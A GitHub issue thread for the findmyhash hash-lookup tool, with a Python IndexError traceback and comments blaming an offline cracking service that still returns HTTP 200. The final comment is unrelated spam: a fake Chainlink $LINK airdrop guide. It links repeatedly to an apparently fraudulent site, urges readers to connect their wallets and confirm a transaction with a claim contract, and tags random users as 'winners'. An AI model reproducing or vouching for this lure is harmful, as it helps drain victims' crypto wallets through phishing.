### ISSUE TITLE
list index out of range

### ISSUE THREAD

**Issue by ebrahimkarimi** [Talanor/findmyhash#20]
Command : `hash-tool crack -a MD5 <hash>`
Output:
`[<Algo.SHA256: 'sha256'>, <Algo.SHA512: 'sha512'>, <Algo.RIPEMD128: 'ripemd128'>, <Algo.RIPEMD320: 'ripemd320'>, <Algo.JUNIPER: 'juniper'>, <Algo.RIPEMD160: 'ripemd160'>, <Algo.WHIRLPOOL: 'whirlpool'>, <Algo.SNEFRU256: 'snefru256'>, <Algo.CISCO7: 'cisco7'>, <Algo.RIPEMD256: 'ripemd256'>, <Algo.GOST: 'gost'>, <Algo.LM: 'lm'>, <Algo.SHA224: 'sha224'>, <Algo.SNEFRU: 'snefru'>, <Algo.SHA1: 'sha1'>, <Algo.MD5: 'md5'>, <Algo.SHA384: 'sha384'>, <Algo.MD4: 'md4'>, <Algo.MD2: 'md2'>]
Traceback (most recent call last):
  File "/usr/local/bin/hash-tool", line 61, in <module>
    main(sys.argv)
  File "/usr/local/bin/hash-tool", line 58, in main
    args.handler(args)
  File "/usr/local/bin/hash-tool", line 25, in crack
    c.crack(Algo(flags.algo.lower()))
  File "/usr/local/lib/python3.6/dist-packages/findmyhash/cracker.py", line 78, in crack
    result = self.__class__.loop_services_crack_hashes(activehash, algo)
  File "/usr/local/lib/python3.6/dist-packages/findmyhash/cracker.py", line 30, in loop_services_crack_hashes
    result = cls.crack_hash(hash, algo, service)
  File "/usr/local/lib/python3.6/dist-packages/findmyhash/cracker.py", line 18, in crack_hash
    result = service.crack(hash, algo)
  File "/usr/local/lib/python3.6/dist-packages/findmyhash/services/MyAddr.py", line 45, in crack
    res = cls.crack_MD5(hash)
  File "/usr/local/lib/python3.6/dist-packages/findmyhash/services/MyAddr.py", line 38, in crack_MD5
    return found[1].parent.contents[1][2:]
IndexError: list index out of range`

**Comment by jsalamander** [comment]
It looks like http://crackhash.com is offline but returns HTTP 200 which causes an error
https://github.com/Talanor/findmyhash/blob/master/findmyhash/services/CrackHash.py#L31

**Comment by Talanor** [comment]
Wow, I really need to use that notification system, my bad. Will investigate soon

**Comment by naudachu** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @snfnwgi, @hanxuer, @luctq, @da-bao-jian, @listenaddress, @tshr-w3, @infinityhacker
